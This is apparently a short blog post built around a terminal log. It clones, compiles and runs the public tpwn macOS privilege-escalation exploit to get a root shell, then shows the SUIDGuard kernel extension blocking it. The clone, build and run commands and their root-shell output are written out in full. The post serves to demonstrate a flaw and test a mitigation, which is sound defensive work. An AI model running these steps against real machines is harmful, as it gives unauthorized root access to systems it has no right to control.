$ git clone https://github.com/kpwn/tpwn.git
Cloning into 'tpwn'...
remote: Counting objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19
Unpacking objects: 100% (19/19), done.
Checking connectivity... done.
$ cd tpwn/
$ make
gcc *.m -o tpwn -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
strip tpwn
$ ./tpwn
leaked kaslr slide, @ 0x0000000000000000
sh-3.2# id
uid=0(root) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),395(com.apple.access_ftp),398(com.apple.access_screensharing-disabled),399(com.apple.access_ssh-disabled)
sh-3.2#
Original post: Young Italian discovers two serious flaws in Mac OS X
Solution #1: NULLGuard
Solution #2: SUIDGuard
SUIDGuard looks like a professional (enterprise) solution to the problem. Official website: www.suidguard.com
$ open ~/Downloads/SUIDGuardNG-106.dmg
$ sudo kextload -v /Library/Extensions/SUIDGuardNG.kext
Password:
Requesting load of /Library/Extensions/SUIDGuardNG.kext.
/Library/Extensions/SUIDGuardNG.kext loaded successfully (or already loaded).
$ ./tpwn
Killed: 9
Perfect!